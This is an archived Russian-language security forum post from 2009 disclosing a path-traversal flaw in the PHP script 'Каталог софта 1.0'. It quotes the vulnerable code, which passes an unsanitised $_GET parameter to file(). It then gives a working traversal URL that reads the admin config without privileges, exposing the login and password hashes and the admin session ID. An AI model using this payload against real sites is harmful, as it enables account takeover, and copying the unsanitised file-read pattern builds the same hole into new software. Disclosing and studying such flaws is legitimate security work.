ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости Каталог софта 1.0
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости Каталог софта 1.0
  #1  
Старый 01.09.2009, 21:21
FriLL
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615

Репутация: 21
По умолчанию Уязвимости Каталог софта 1.0
Скрипт с сайта homescript.ru


Уязвимый код

PHP код:
 $file=file("db/autor/$_GET[id].txt");

          foreach($file as $line)
                     {
                       $line=trim($line);
                       $expl=explode("*",$line);

                       if(file_exists("db/$expl[0]/$expl[1].txt"))$path="db";
                       else $path="db/pre_prog";

                       $file_new=file("$path/$expl[0]/$expl[1].txt");
                       $file_new[0]=trim($file_new[0]);
                       $file_new[1]=trim($file_new[1]);
                       $file_new[8]=trim($file_new[8]);
                       $file_new[10]=trim($file_new[10]);
                       $file_new[11]=trim($file_new[11]);
                       echo "<table width=80% style=\"border-bottom:$conf[69]px $conf[70] $conf[68]\" align=center>
                                  <tr>
                                     <td id=zip_head_prog_news>$file_new[1]";
                                      $stat=array();
                                           $stat=file("db/stat/$expl[1].txt");
                                           $stat=explode("*",$stat[0]);
                                           if($stat[0]!=0)
                                            {
                                              $itog=ceil($stat[1]/$stat[0]);
                                              for($n=0;$n<$itog;$n++)echo "<img src=img/star.jpg border=0>";
                                            }
                                 echo "</td>
                                  </tr>
                                  <tr>
                                     <td id=zip_text_news>$file_new[8]</td>
                                  </tr>
                                  <tr>
                                     <td id=zip_text_news><span id=zip_dat_news>$file_new[10]</span></td>
                                  </tr>
                                  </table><br />";

                     } 


те читалка через file()

читаем конфиги (права админа не нужны)
admin/autor_prog.php?id=../../admin/conf/conf

Вывод идет в перемешку с error-ами
но прочесть это не мешает

в конфигах 3 строки
1) хеш логина
2) хеш пароля
3) идентификатор сессии админа
Последний раз редактировалось FriLL; 01.09.2009 в 21:28..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продажа от Goldriver'a Goldriver ICQ - Покупка, продажа 3 06.07.2009 20:15
Мобильные браузеры Skyfire 1.0 и Opera Mobile 9.7 jerrri Мировые новости 0 10.06.2009 18:29
Перевод описания плагинов w3af Kuzya Статьи 4 07.06.2009 09:13
FreeBSD PPPoE + slow cpu diakon2 *nix 17 23.02.2009 14:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ